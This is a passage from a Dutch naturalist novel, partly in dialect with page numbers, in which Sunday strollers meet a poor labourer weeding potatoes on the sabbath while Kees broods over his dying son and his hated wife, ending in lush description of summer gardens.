om sain haindroaide.… soo om d’r ’n woordje uit te
kraige, waa’s tie norsch.… Moar d’r uit niks! Enne
Piet?.. Piet? Hep die sàin nie veul meer afsnauwt..
aa’s aers?.. Sou die?.. sou die wa’ snapt hewwe?..
Och! hai most d’r moar late woaie!.. d’r waa’s d’r moar
aldegoàr bangighait! De kerels wiste puur niks! niks!
gain snars!

Dirk en Kees waren op ’t pad blijven staan voor ’n

duinbrok, breed goud-zandig, half verglooiend achter
kronkelig vergroeide wilgen. ’n Blauwbekielde stond ’r
te zwoegen, in den snikheeten zonnebrand.— [239]

—Wa’ nou Beemster?.… de sabbat onthailige?..

hoonde Kees.
Beemster keek òp, schrok toen ie strooperstronie van
Kees zag. Maar nou op den dag wou ie geen angst
voor den vent toonen.

—Nou maa’n, wi’ jai ’t t’met doene? Ikke gun je vast ’t

kattebakkie!

—Dankkie, lachte Kees, da’ rooit noa niks?

Dirk stil, koeiig-traag, keek op de wriemelende

werkhanden van Beemster. Ouë Gerrit was blijven
staan, naast Kees. Nou voelde ie zich toch weer
lekker, dat hij, op Zôndag, geen aardappels te wieden
had.

—Binne ’t loate?

—Daa’s net, moar an die hoek hai je makkeboone.…

stoan mooi hee?.…

—’t Is main f’rdomme ’n kattebakkie! schreeuwde de

daggelder naar de kerels in de laan,—da’ gòan je
sondag!.. ik sien gain waif, gain kind.… Nou poer ikke
tog van sonsopgang! tut ’s nachts, veur main diefe-
loontje hee?.… Enne om d’r sellefers ’n happie te
kenne freete in de winter.… mô’k an oarepels rooie
veur àige bik.… Daa’s iedere sondag eenderlai, ’t
eenige uuretje da’ je oferhept veur àige werk. Gunter
stoan d’r Bolk en Hannes Skrepel en Piet Steinstroa..
en Gais! daa’s nooit rust!

—Daa’s net, riep diepstemmig klankvol Kees terug,

smart-ernstig getroffen door ’t ploeteren en den
zweetdruipenden gloeikop van Beemster.
 Werker hield éven op met wieden, sprong van den
grond, tusschen z’n regels uit, keek naar Kees. Zon
schroeide z’n kop, waarop ’t zweet nu met vette
droppels glom, als neergehageld op wangen en
slapen.

—Kaik, gunters, hier ’t hoekie òm, stoan d’r Gais van ’t

Binnepadje, de looper van „De Dageroad”, die poert
s’n aige ’n beroerete.… Die hep d’r nog vaif golde in
de waik! van s’n vrachtraie.. van ses s’oafus tut ellef..
twoalef hee?.. enne in ’t murgen ’n poar uur.… aa’s ’t
mot!.…

Nou hep die d’r op den dag ’n hokkesoakie! moar.…

se [240]plukke d’r sain! en betoale nie! Nou hep tie s’n
leste duitje inskote! Hai kèn d’r puur baidele!.… Van
die vaif golde van kooks.… van die ses pop veur
turrif.… van die twee pop veur hout.… soo.… van
moand tut moand hee?.… nou, in ’t lest.. dacht ie..
f’rek jai mi je snoeptoafel! Hep ie lappie grond
pacht!.… Nou plant-tie wa’ kool, oarepels.… en da
bewerkt ie.. an den sondag! en nou komp de kapeloan
en sait d’r da’.. da’ sabbatskender hiet!.. Wâ! sait ie!
Sorrige.. da je an de winter nie heuldegoar
doodhongert, saittie!… is dâ sonde?—Nou.… in de
waik ken die d’r gain poot ànsloan.. saittie net aa’s ik
nie!.… nou werkt ie tut s’oàfus! nou … ikke hep d’r ’n
suur brok brood.… moar hemmis.… hemmis nog ’n
handje erreger.…

Hij had zich weer tusschen z’n regels gebukt, en

opsliertend woelde z’n hand ’t onkruid uit. Achter ’m
stonden in bloei van lichtend paars, de vroege
 aardappels. Fijne bloemengeur dampte uit den
zandigen, van zonnegloei ingevreten hobbeligen
grond òp. ’t Lage loof groende donker, en zangerig ’t
bloesempaars jubelde onder ’t vuur-fel hemelblauw.

Verwaarloosd stond z’n boel! In de hevige

aardbeidrukte had ie ’r, ook Zondagochtend met geen
vin aan kunnen werken. Nu stikte de rommel van
onkruid en vuil. Ouë Gerrit loerde maar, wreef langs
z’n baard, zei niks, dóód voor ’t gemartel en ’t gepoer
van Beemster. Hij zag niet eens z’n heet-dampenden
natten zweetkop, die bronsrossig glom in zonzeng. Hij
voelde niet dat de vent onder ’t rooien de hitte uit den
grond opgroef naar z’n eigen strot. Hij loerde maar
naar de kerels, of d’r niks was aan den weg voor hèm,
om mee te gappen. Er zat al zoo lang hittejeuk in z’n
steelhanden. De zomerploeter hing ’m al lang de keel
uit. Hij snakte naar den herfst, naar de inplanting van
bollen, als alles zoo onbeschermd stond op ’t veld,
gereedschap en goed.

—En pest-harde grond daa’t hier is, klaagde de

Zondagochtend-zwoeger op ’t duinbrok weer, ingebukt
pratend onder ’t wieden,—je ken d’r hier poere mit ’n
houwail, dan rooit.… rooit nòg noa nies! [241]

—Da’ wee’k, dá’ wee’k.… lachte Dirk goeiig neerziend

op den werker, die daar geschroeid bleef zitten te
zuchten en hurken, in verlammenden kruip, ingekneld
tusschen de nauwe aardappelen-regels.—Kees
voelde iets branden in z’n keel, iets van meelij met
Beemster. Maar gauw dat gewoel wrokte wèg in
onbestemden haat en nijd tegen alles; dat zijn Wimpie
 daar neergeslagen lag, elken dag bleeker, zwakker,
beroerder. Ieder dag zong ’t kind meer, en ied’ren dag
vloekte, schold hij heviger tegen ’t wijf en de vuile
menschklont van z’n schoonmoeder. Hij deed z’n
werk, loom, onverschillig, al vonden de anderen ’t heel
raak.—Maar onder al z’n werkgedoe, zag ie Wimpie
op z’n bedje of in den krakenden kinderwagen, in ’t
zonnetje, zingende stervend, vergeeld, vergrauwd,
vermagerd. En altijd in gebedjes, met dat weeke
stemmetje, ook zaligend en biddend voor de ziel van
zijn vader. Telkens smoorde Kees huil van woede
omdat ie ’r niet meer wild doorheen durfde ranselen.
Want als ie dat gefemel en geprevel zag op de bleeke
lipjes, had ie lust ’t kereltje ’n mep te geven, dat ie ’r
stom verbluft van zou kijken.—Z’n lieve jochie, al maar
z’n geraamtehandjes doopend in ’t wijwater-bakkie.…
dat gekke kijken op die beeldjes van ’t heilige Hart.…
Z’n lieve jochie voor hèm bidden, voor zijn zaligheid.
Ze konden z’n bast voor zijn part als ’n dooie hond te
drijven leggen in ’n stinksloot, was ’t nog goed genoeg
voor hèm.—Om dol te worden als ’t wijf ’m treiterig
sarde en zei, dat Wimpie door zijn goddeloosheid zoo
ziek blèèf en nooit beter kòn worden. Op die
oogenblikken kon ie ’r met moordlust en bloeddronken
duizel ’n mes de ribben instooten, dat kreng!—Wat
later dan, door ’n marsch in de duinen gekalmeerd,
begreep ie dat het kereltje ’t niet helpen kon; niet wist
wat ’t deed. In al z’n rauwen haat, die als ’n razernij
over ’m heen rilde, voelde ie dat soms heel zuiver.
Maar met één, dat ’t ventje al beroerder, akeliger keek
uit z’n geel-zieke oogen.…
Hij hoorde de doffe mor-stem van den Zondagzwoeger
op ’t duin niet meer, die telkens, schokkerend naar
adem, voortsprak, getroost al ’n beetje dat ie z’n
wrangen jammer aan ’n [242]ander uitklagen kon. Dirk
schudde maar met z’n kop, half-luisterend en slaperig
dommelend op ’t blakerende plekje. Ouë Gerrit wou
d’r telkens van doorstappen.—

Brommerig en loom kuierden ze eindelijk verder.

Heerlijk, in zoete geuren wasemde ’t walstroo rond, en
zonnig-heet gloeide ’t rood-zandige belommerde pad,
in bosch-vochtig zomerdrenksel, vol zoeten
dennenreuk, warm en prikkelend van woudgrondgeur.
Stil, de oprijlaantjes van beblakerde hoeven,
droomden in godstilte van Zondagsland.—Achter grijs-
glanzige wilgen, popels en sneeuwzilverend ritsel van
wond’re wit-fluweelen abeelen, achter struiken en
grasbloemen, flonkerden de besseboompjes, grillig
bezond, in spiralende prachtglanzing, hel-rood; overal
koralen trosjes, jubelrood, glansbevend van goud-
helle zonning.—

Tusschen malsch groen van gewas, klauterden de

boompjes hurkig òp. Struik-laag in drommende
trossen, hingen de vurige besjes tot op d’aarde,
weelde-trossend in zonnerood en schaduwrood.
Overal, aan weerskanten van de laan, al verder, al
dieper, in wasemig lommerend zomergoud, blakerden
de tuinderijen met dien wondergrilligen tooi van
vruchtjes, met d’r helle glansrood, àchter den wilden
hoogen bloei van lila en witte koekoek, goud bestoven
geel van rolklaver, en de zoete cier van
duizendschoon; àchter wemel van paarse, zoet-